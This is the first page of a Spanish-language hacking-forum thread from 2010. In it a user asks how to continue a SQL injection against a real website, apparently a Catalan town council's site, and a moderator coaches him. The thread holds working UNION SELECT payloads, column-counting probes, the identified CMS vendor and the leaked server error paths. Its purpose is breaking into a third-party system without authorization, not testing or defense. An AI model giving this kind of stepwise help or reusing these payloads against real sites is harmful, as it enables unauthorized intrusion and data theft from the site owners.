elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:30  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Ayuda como seguir con SQL Inyection 		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda como seguir con SQL Inyection  (Leído 1,987 veces)
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Ayuda como seguir con SQL Inyection
« en: 22 Marzo 2010, 20:08 »
Salu2,

Tengo una página que he podido, por lo menos saber las columnas de su base de datos que tiene, está creada en php y core sobre Mysql:

http://www.lapaginaweb.com/index.php?contingut=2&codi=-1%20order%20by%205/*

Poniendo al final /* me deja ver que hay 5 porque si pongo 6 me peta.

El problema está seguir, he provado con:

-1+union+all+select 1,2,3,4,5/*

Y nada me da este error:

No s'ha pogut llegir select * from contingut where codi=-1 union all select 1,2,3,4,5/*

Alguien sabe como proseguir.... gracias para la ayuda a un newbaby!!!!!
En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #1 en: 22 Marzo 2010, 20:45 »
talves porque necesita procesar un valor válido para poder mostrarse.
me da la impresión de que es blind sql o tendrás que ingeniartelas para fabricar una query tan fiel como la original y solo modificando un valor de una columna.

PD:
el código original no será este?
Citar
No s'ha pogut llegir select articles2.*, articles2_idioma.text as descr, articles2_idioma.text_curt as text_curt from articles2, articles2_idioma where codi= and id_idioma=2 and codi=id_article
« Última modificación: 22 Marzo 2010, 20:47 por WHK » En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #2 en: 22 Marzo 2010, 20:53 »
Salu2, no se donde has sacado el codigo pero no es este intentare con blind sql, no se si me servirá......... si me puedes aportar algo mas me lo dices mil gracias
En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #3 en: 22 Marzo 2010, 21:06 »
Bueno, por lo que he podido averiguar, ese sistema web que observas es un sistema CMS para shopping creado por
http://www.comunicatek.com/

y hay varias por internet.

yo mientras tanto pruebo acá y tu pruebas ayá.

Ese sitio web debe tener un buscador:
http://ejemplo.com/buscador.php?idioma=2 union select user(),2,3 --
u00061@localhost

con eso ya podrías inyectar libremente.
Lo raro que me fijé en este sistema es que cuando intentas obtener las columnas con order by siempre te retorna un numero mas elevado de columnas que el real, por ejemplo a mi me retornaba que habian 4 columnas pero eran solo 3 al igual que en la tabla de productos, también es resultado menos uno.

el resultado queda en el código fuente, no lo verás desde el explorador directamente.
Para eso haz view-source:htt://ejemplo... y buscas esto:
Código:
<option value='33'><option value='
ahi en ese valor te aparecerá tu inyección.

Saludos.
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #4 en: 22 Marzo 2010, 21:06 »
De donde has cacado el codigo????
En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #5 en: 22 Marzo 2010, 21:07 »
googleando :P y viendo el código fuente, etc
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #6 en: 22 Marzo 2010, 21:10 »
No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc

mmmmmm
En línea
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #7 en: 22 Marzo 2010, 21:12 »
OK PROVANDO, y como dices tu es de esta gente si !!!
En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #8 en: 22 Marzo 2010, 21:13 »
prueba con el buscador como te puse mas arriba
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #9 en: 22 Marzo 2010, 21:18 »
no tiene buscador............. buscando mas
En línea
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #10 en: 22 Marzo 2010, 21:28 »
mmmmmmm en el fichero rss.php?

http://www.*******.info/rss.php?noticies=2%20union%20select%20user%28%29,2,3%20--bisbal@localhost



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/usuaris/bisbal/php/categoria.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/rss.php on line 27

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/php/rss10.php on line 77
http://www.******.cat Les últimes notícies de l'Ajuntament http://www.******.cat/index.php?noticies=2&codi=376 PLE ORDINARI DEL 26 DE GENER DE 2010  http://www.********.cat/index.php?noticies=2&codi=374 PLE EXTRAORDINARI DEL DIA 21 DE GENER DE 2010 http://www.******.cat/index.php?noticies=2&codi=364 PLE ORDINARI DEL 27 DE GENER DE 2009 http://www.******.cat/index.php?noticies=2&codi=363 PLE ORDINARI DEL 30 DE JUNY DE 2009  http://www.*********.cat/index.php?noticies=2&codi=361 PLE ORDINARI DEL DIA 22 DE DESEMBRE DE 2009
En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #11 en: 22 Marzo 2010, 21:36 »
jajajaja espero que no sea el bisbal que yo conozco o vas a terminar igual que t1z4k jajaja
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #12 en: 22 Marzo 2010, 21:42 »
JAJAJAJAJAJ no no lo es jejejejejejejeje  mmmm no hay maneras buffff.....
En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #13 en: 22 Marzo 2010, 21:43 »
home/usuaris/bisbal/templates_c/contingut.tpl
ese templates_c me recuerda a un post que está mas abajo, me da la impresion de que es el mismo sistema pero estoy inseguro
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #14 en: 22 Marzo 2010, 21:50 »
Smarty version 2.5.0   mmmmm
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como seguir en Python
Scripting 		Fyrox 1 342 Último mensaje 28 Septiembre 2011, 04:05
por Novlucker
Consejo de que seguir estudiando...(Ayuda)
.NET 		SixToex (Agares) 4 584 Último mensaje 31 Marzo 2012, 09:57
por SixToex (Agares)
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines